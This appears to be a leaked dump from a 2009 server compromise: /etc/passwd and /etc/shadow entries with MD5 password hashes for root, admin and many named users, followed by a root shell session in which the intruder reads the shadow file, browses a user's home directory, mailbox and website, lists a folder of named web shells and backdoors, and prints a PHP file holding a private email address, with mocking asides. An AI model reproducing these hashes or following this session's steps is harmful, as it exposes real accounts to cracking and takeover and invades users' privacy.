penguin:x:513:514::/home/penguin:/bin/false
|
||
ntp:x:38:38::/etc/ntp:/sbin/nologin
|
||
furiogamin:x:516:517::/home/furiogamin:/bin/false
|
||
kaza:x:517:518::/home/kaza:/bin/false
|
||
pimpinjg:x:518:519::/home/pimpinjg:/bin/false
|
||
dakilla:x:521:522::/home/dakilla:/bin/false
|
||
bootroot:x:522:523::/home/bootroot:/bin/false
|
||
scraft758:x:525:526::/home/scraft758:/bin/false
|
||
hstrike:x:526:527::/home/hstrike:/bin/false
|
||
romeo:x:528:529::/home/romeo:/bin/false
|
||
xckx:x:529:530::/home/xckx:/bin/false
|
||
h3mod:x:530:531::/home/h3mod:/bin/false
|
||
clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
|
||
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
|
||
avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
|
||
hbxmike:x:535:536::/home/hbxmike:/bin/false
|
||
wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
|
||
haiobr:x:537:538::/home/haiobr:/bin/false
|
||
odin:x:538:539::/home/odin:/bin/false
|
||
sam:x:539:540::/home/sam:/bin/false
|
||
mrgod:x:540:541::/home/mrgod:/bin/false
|
||
pagewiz:x:541:542::/home/pagewiz:/bin/false
|
||
zer0:x:542:543::/home/zer0:/bin/false
|
||
dablitz:x:543:544::/home/dablitz:/bin/false
|
||
ristop:x:544:545::/home/ristop:/bin/false
|
||
bloo:x:545:546::/home/bloo:/bin/false
|
||
root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
|
||
bin:*:14253:0:99999:7:::
|
||
daemon:*:14253:0:99999:7:::
|
||
shutdown:*:14253:0:99999:7:::
|
||
halt:*:14253:0:99999:7:::
|
||
mail:*:14253:0:99999:7:::
|
||
ftp:*:14253:0:99999:7:::
|
||
nobody:*:14253:0:99999:7:::
|
||
dbus:!!:14253:0:99999:7:::
|
||
nscd:!!:14253:0:99999:7:::
|
||
vcsa:!!:14253:0:99999:7:::
|
||
rpc:!!:14253:0:99999:7:::
|
||
sshd:!!:14253:0:99999:7:::
|
||
pcap:!!:14253:0:99999:7:::
|
||
mailnull:!!:14253:0:99999:7:::
|
||
smmsp:!!:14253:0:99999:7:::
|
||
rpcuser:!!:14253:0:99999:7:::
|
||
nfsnobody:!!:14253:0:99999:7:::
|
||
rpm:!!:14253:0:99999:7:::
|
||
haldaemon:!!:14253:0:99999:7:::
|
||
named:!!:14257::::::
|
||
apache:!!:14257::::::
|
||
diradmin:!!:14256::::::
|
||
mysql:!!:14256::::::
|
||
webapps:!!:14256:0:99999:7:::
|
||
majordomo:!!:14256::::::
|
||
dovecot:!!:14256::::::
|
||
admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
|
||
hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
|
||
keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
|
||
yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
|
||
aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
|
||
beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
|
||
hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
|
||
wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
|
||
penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
|
||
ntp:!!:14273::::::
|
||
furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
|
||
kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
|
||
pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
|
||
dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
|
||
bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
|
||
scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
|
||
hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
|
||
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
|
||
xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
|
||
h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
|
||
clamav:!!:14336:0:99999:7:::
|
||
avahi:!!:14336::::::
|
||
avahi-autoipd:!!:14336::::::
|
||
hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
|
||
wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
|
||
haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
|
||
odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
|
||
sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
|
||
mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
|
||
pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
|
||
zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
|
||
dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
|
||
ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
|
||
bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
|
||
root@server2:~[root@server2 ~]# grep romeo /etc/shadow
|
||
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
|
||
root@server2:~[root@server2 ~]# w
|
||
04:05:41 up 18:48, 1 user, load average: 0.34, 0.34, 0.23
|
||
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
||
root pts/0 cpe-76-1x5-xx-xx 03:39 26:24 0.00s 0.00s -bash
|
||
root@server2:~[root@server2 ~]# ls -al
|
||
total 30488
|
||
drwxr-x--- 11 root root 4096 May 23 02:47 .
|
||
drwx--x--x 25 root root 4096 May 22 09:26 ..
|
||
-rw------- 1 root root 1132 Mar 11 01:44 anaconda-ks.cfg
|
||
-rw-r--r-- 1 root root 0 May 20 17:26 authorized_keys2
|
||
-rwxr-xr-x 1 root root 10 May 23 03:02 .bash_history
|
||
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
|
||
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
|
||
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
|
||
drwxrwxrwx 24 1000 1000 4096 Apr 28 14:55 clamav-0.95.1
|
||
-rw-r--r-- 1 root root 24260964 Apr 8 08:24 clamav-0.95.1.tar.gz
|
||
-rw-r--r-- 1 root root 171053 May 22 13:49 cleaned_shells_php.txt
|
||
drwxr-xr-x 4 root root 4096 Mar 18 00:50 .cpan
|
||
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
|
||
-rw-r--r-- 1 root root 4 Jan 12 16:21 .custombuild
|
||
-rwxr-xr-x 1 root root 21171 Jan 13 14:13 da.cpanel.import.pl
|
||
-rw-r--r-- 1 root root 288 Mar 31 05:21 defaults.conf
|
||
drwxr-xr-x 2 root root 4096 Mar 23 19:03 export
|
||
-rw-r--r-- 1 root root 1155 May 15 22:15 f.c
|
||
drwxr-xr-x 3 root root 4096 May 12 20:35 forum
|
||
-rw-r--r-- 1 root root 265 May 14 15:19 ifconfig
|
||
drwxr-xr-x 2 root root 4096 Mar 23 19:03 import
|
||
-rw------- 1 root root 12288 Mar 27 04:26 .import.swp
|
||
-rw-r--r-- 1 root root 1724 Apr 1 18:53 initsec
|
||
-rw------- 1 root root 97 May 23 04:02 .lesshst
|
||
-rw-r--r-- 1 root root 27 May 23 02:35 load
|
||
-rw------- 1 root root 42 Feb 5 17:18 .my.cnf
|
||
-rw------- 1 root root 37 May 2 15:19 .mysql_history
|
||
-rw-r--r-- 1 root root 9 Mar 31 05:21 .mytop
|
||
drwxr-xr-x 16 webapps apache 4096 Apr 28 16:11 nmap-4.85BETA8
|
||
-rw-r--r-- 1 root root 6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
|
||
drwxr-xr-x 3 root root 4096 May 20 14:31 qurantine
|
||
-rw------- 1 root root 1024 Apr 2 18:01 .rnd
|
||
-rwxr-xr-x 1 root root 2024 Apr 28 14:44 scan.pl
|
||
drwx------ 2 root root 4096 May 20 15:00 .ssh
|
||
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
|
||
-rw------- 1 root root 12288 May 23 03:02 .test.swp
|
||
drwxr-xr-x 2 root root 4096 May 14 14:00 tmp
|
||
-rwxr-xr-x 1 root root 47429 May 16 2008 tuning-primer.sh
|
||
root@server2:~[root@server2 ~]# cat .bash_history
|
||
exit
|
||
exit
|
||
root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
|
||
root@server2:~[root@server2 ~]# date
|
||
Sat May 23 04:06:57 PDT 2009
|
||
root@server2:~[root@server2 ~]# cd /home/romeo/
|
||
root@server2:/home/romeo[root@server2 romeo]# ls -al
|
||
total 44
|
||
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 .
|
||
drwx--x--x 36 root root 4096 May 23 02:33 ..
|
||
drwx------ 2 romeo romeo 4096 Feb 17 16:07 backups
|
||
-rw-r--r-- 1 romeo romeo 33 Dec 22 09:57 .bash_logout
|
||
-rw-r--r-- 1 romeo romeo 176 Dec 22 09:57 .bash_profile
|
||
-rw-r--r-- 1 romeo romeo 124 Dec 22 09:57 .bashrc
|
||
-rw------- 1 romeo romeo 0 Feb 8 08:45 .clipboard.txt
|
||
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 domains
|
||
drwxrwx--- 4 romeo mail 4096 Feb 17 16:07 imap
|
||
drwxrwx--- 5 romeo mail 4096 Dec 23 08:29 Maildir
|
||
lrwxrwxrwx 1 romeo romeo 35 Feb 17 16:07 public_html ->
|
||
./domains/darkmindz.com/public_html
|
||
-rw-r----- 1 romeo mail 34 Apr 19 16:26 .shadow
|
||
root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
|
||
4.0K Maildir/tmp
|
||
68M Maildir/new
|
||
4.0K Maildir/cur
|
||
68M Maildir/
|
||
68M total
|
||
root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
|
||
root@server2:/home/romeo[root@server2 romeo]# cd domains
|
||
root@server2:/home/romeo/domains[root@server2 domains]# ls -la
|
||
total 16
|
||
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
|
||
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
|
||
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
|
||
root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
|
||
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
|
||
-la
|
||
total 40
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 .
|
||
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 ..
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 .htpasswd
|
||
drwxr-xr-x 2 root root 4096 May 23 00:10 logs
|
||
drwx--x--x 3 romeo romeo 4096 Dec 22 09:57 public_ftp
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 public_html
|
||
drwxr-xr-x 2 root root 4096 May 1 00:10 stats
|
||
-rw-r--r-- 1 romeo romeo 12151 Feb 9 09:01 view_topic.php
|
||
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
|
||
public_html/
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# ls -al
|
||
total 47264
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
|
||
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
|
||
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
|
||
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
|
||
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
|
||
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
|
||
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
|
||
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
|
||
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
|
||
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
|
||
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
|
||
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
|
||
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
|
||
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
|
||
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
|
||
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
|
||
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
|
||
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
|
||
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
|
||
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
|
||
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
|
||
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
|
||
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
|
||
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
|
||
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
|
||
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
|
||
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
|
||
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
|
||
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
|
||
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
|
||
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
|
||
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
|
||
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
|
||
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
|
||
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
|
||
-rw-r--r-- 1 romeo romeo 46487316 May 23 04:07 stress_test.txt
|
||
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
|
||
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
|
||
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
|
||
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
|
||
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
|
||
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
|
||
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
|
||
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
|
||
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
|
||
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
|
||
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# ls -la scripts/
|
||
total 476
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 .
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
|
||
-rw-r--r-- 1 romeo romeo 4770 Jan 13 12:11 builder.js
|
||
-rw-r--r-- 1 romeo romeo 588 Jan 13 12:11 cli.js
|
||
-rw-r--r-- 1 romeo romeo 35851 Jan 13 12:12 controls.js
|
||
-rw-r--r-- 1 romeo romeo 35253 Jan 13 12:11 dragdrop.js
|
||
-rw-r--r-- 1 romeo romeo 38986 Jan 13 12:12 effects.js
|
||
-rw-r--r-- 1 romeo romeo 8663 Feb 14 12:40 functions.js
|
||
-rw-r--r-- 1 romeo romeo 6897 Jan 13 12:11 growl.js
|
||
-rw-r--r-- 1 romeo romeo 63854 Jan 13 12:11 lightwindow.js
|
||
-rw-r--r-- 1 romeo romeo 52665 Jan 13 12:12 php.min.js
|
||
-rw-r--r-- 1 romeo romeo 1457 Jan 13 12:11 pm.js
|
||
-rw-r--r-- 1 romeo romeo 1637 Jan 13 12:11 pngfix.js
|
||
-rw-r--r-- 1 romeo romeo 3261 Jan 13 12:11 proto.menu.js
|
||
-rw-r--r-- 1 romeo romeo 130380 Jan 13 12:12 prototype.js
|
||
-rw-r--r-- 1 romeo romeo 2733 Jan 13 12:11 register.js
|
||
-rw-r--r-- 1 romeo romeo 2711 Jan 13 12:11 scriptaculous.js
|
||
-rw-r--r-- 1 romeo romeo 121 Jan 13 12:11 shoutbox.js
|
||
-rw-r--r-- 1 romeo romeo 10296 Jan 13 12:12 slider.js
|
||
-rw-r--r-- 1 romeo romeo 1920 Jan 13 12:12 sound.js
|
||
-rw-r--r-- 1 romeo romeo 20197 Jan 13 12:12 unittest.js
|
||
-rw-r--r-- 1 romeo romeo 6145 Feb 14 12:40 user.php
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# ls -la shell/
|
||
total 1564
|
||
drwxr-xr-x 2 root root 4096 May 20 14:30 .
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
|
||
-rw-r--r-- 1 romeo romeo 1297 Feb 16 21:05 ajan.txt
|
||
-rw-r--r-- 1 romeo romeo 44210 Feb 16 21:06 b64.txt
|
||
-rw-r--r-- 1 romeo romeo 140 Feb 16 21:06 backdoor.txt
|
||
-rw-r--r-- 1 romeo romeo 11141 Feb 16 21:06 c101.txt
|
||
-rw-r--r-- 1 romeo romeo 1468 Feb 16 21:06 cmd.txt
|
||
-rw-r--r-- 1 romeo romeo 18519 Feb 16 21:06 codeanalyzer.txt
|
||
-rw-r--r-- 1 romeo romeo 114861 Feb 16 21:06 constance.txt
|
||
-rw-r--r-- 1 romeo romeo 40682 Feb 16 21:06 CrystalShell v.1.txt
|
||
-rw-r--r-- 1 romeo romeo 83029 Feb 16 21:06 CyberSpy5.txt
|
||
-rw-r--r-- 1 romeo romeo 43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
|
||
-rw-r--r-- 1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
|
||
-rw-r--r-- 1 romeo romeo 39433 Feb 16 21:06 eko.txt
|
||
-rw-r--r-- 1 romeo romeo 38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
|
||
-rw-r--r-- 1 romeo romeo 24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
|
||
PRiV8.txt
|
||
-rw-r--r-- 1 romeo romeo 2089 Feb 16 21:06 imageshell.JPG
|
||
-rw-r--r-- 1 romeo romeo 1768 Feb 16 21:06 index.php
|
||
-rw-r--r-- 1 romeo romeo 17440 Feb 16 21:06 kscript.txt
|
||
-rw-r--r-- 1 romeo romeo 2342 Feb 16 21:06 l0ger.txt
|
||
-rw-r--r-- 1 romeo romeo 1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
|
||
-rw-r--r-- 1 romeo romeo 33796 Feb 16 21:06 Mysql interface v1.0.txt
|
||
-rw-r--r-- 1 romeo romeo 34398 Feb 16 21:06 mysql.txt
|
||
-rw-r--r-- 1 romeo romeo 38856 Feb 16 21:06 ntdaddy.txt
|
||
-rw-r--r-- 1 romeo romeo 124953 Feb 16 21:06 r57.txt
|
||
-rw-r--r-- 1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
|
||
-rw-r--r-- 1 romeo romeo 7002 Feb 16 21:06 steg.txt
|
||
-rw-r--r-- 1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
|
||
-rw-r--r-- 1 romeo romeo 70402 Feb 16 21:06 webadmin.txt
|
||
-rw-r--r-- 1 romeo romeo 5057 Feb 16 21:06 WinX Shell.txt
|
||
-rw-r--r-- 1 romeo romeo 2455 Feb 16 21:06 Worse Linux Shell.txt
|
||
-rw-r--r-- 1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
|
||
-rw-r--r-- 1 romeo romeo 10418 Feb 16 21:06 XSSscan.py.txt
|
||
-rw-r--r-- 1 romeo romeo 10269 Feb 16 21:06 xx.txt
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# #ELEET
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# ls -al
|
||
total 47264
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
|
||
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
|
||
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
|
||
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
|
||
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
|
||
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
|
||
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
|
||
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
|
||
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
|
||
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
|
||
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
|
||
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
|
||
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
|
||
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
|
||
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
|
||
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
|
||
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
|
||
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
|
||
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
|
||
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
|
||
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
|
||
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
|
||
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
|
||
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
|
||
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
|
||
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
|
||
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
|
||
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
|
||
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
|
||
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
|
||
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
|
||
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
|
||
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
|
||
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
|
||
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
|
||
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
|
||
-rw-r--r-- 1 romeo romeo 46488303 May 23 04:08 stress_test.txt
|
||
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
|
||
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
|
||
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
|
||
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
|
||
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
|
||
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
|
||
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
|
||
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
|
||
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
|
||
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
|
||
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
|
||
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# cat test.php
|
||
<?php
|
||
/*======================================================================*\
|
||
| Cybershade CMS - Your CMS, Your Way |
|
||
\*======================================================================*/
|
||
define('INDEX_CHECK', 1);
|
||
define('CMS_DEBUG', 0);
|
||
define('CMS_MENU', 'forum');
|
||
$cms_root = '';
|
||
$page_name = '';
|
||
include "core/core.php";
|
||
|
||
$breadcrumb = array(
|
||
);
|
||
|
||
include "core/page_header.php";
|
||
|
||
mail("crawleruk@gmail.com", 'test', "mail() sent msg");
|
||
mailer("crawleruk@gmail.com", 'noreply@darkmindz.com', 'test', 'mailer() sent
|
||
msg');
|
||
|
||
include "core/page_footer.php";
|
||
?>root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
|
||
public_html]# ls -la
|
||
total 47264
|
||
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
|
||
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
|
||
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
|
||
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
|
||
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
|
||
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
|
||
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
|
||
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
|
||
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
|
||
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
|
||
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
|
||
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
|
||
